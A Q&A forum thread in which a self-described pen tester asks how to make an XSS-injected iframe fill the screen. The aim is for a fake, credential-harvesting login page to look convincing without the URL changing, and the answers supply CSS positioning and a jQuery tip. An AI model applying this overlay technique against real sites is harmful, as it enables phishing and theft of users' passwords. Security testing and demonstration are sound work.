# Creating a full screen iframe

Tags: html, iframe, xss

I'm currently looking into XSS attacks, with the aim of using them in client demonstrations (I'm a pen tester). I've written a tool that will host a malicious version of a website's login page (that harvests usernames and passwords) and then redirects the victim back to the original website. However, I have been trying to get it to work using iframes instead, as it would look far more convincing as the url won't change.

I've googled about and this seems to be the appropriate code:

```
<iframe src="http://192.168.0.1/login.php" style="border: 0; width: 100%; height: 100%">
```

but the iframe created is by no means full screen (on internet explorer and firefox). Here is a screenshot

[image: screenshot]

As you can see, the iframe login page is beneath the "what is your name?" area, thus no where near full screen. I've tried editing the css file of the malicious login page, to include full screen parameters, but this has no effect either.

Does anyone have any solutions? Thanks!

Answer (score 47, accepted):

Not tested, but try this:

```
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:absolute; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
```

or

```
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
```

Comment: thanks for your input man but unfortunately they just spawn a small iframe in the top left hand corner =/

Comment: what about adding `width:100%;` and `height:100%` to that as well?

Comment: ah of course =) - the second one worked with the width and height =D - thanks a lot moin!

Comment: ah it only works on firefox, on internet explorer it just creates a large iframe near the center. I'll keep playing about with it though =) cheers

Comment: Hmm if we can use javascript or jQuery you can do it better by moving the iframe right up just after the `<body>` tag

Comment: I can use javascript yes, but I'm not sure I quite understand how to move the iframe up to underneath the <body> tag. I'm injecting into a div that i can break out of, but I don't know how to go about moving the iframe upwards.

Comment: with jQuery you'd just do something like `$('iframe#xyz').append('body');`

Comment: Check the things you upload before publishing, things like "not tested" are not useful at all.

Comment: I have used `position:fixed` and my footer is no more visible. How would I rectify it?

Answer (score 4):

This code works:

```
<html> 
    <head>
        <style type="text/css">
            body
            {
                margin:   0;
                overflow: hidden;
            }

            #iframe1
            {
                height:   100%;
                left:     0px;
                position: absolute;
                top:      0px;
                width:    100%;
            }
        </style>
    </head>

    <body>
        <iframe id="iframe1" src="HERE PLACE YOUR URL" frameborder="0"></iframe>
    </body>
</html>
```

Comment: to be clear, for others who come looking: the key differentiator here is the "frameborder" attribute on the iframe.

Comment: The B in frameBorder should be capitalized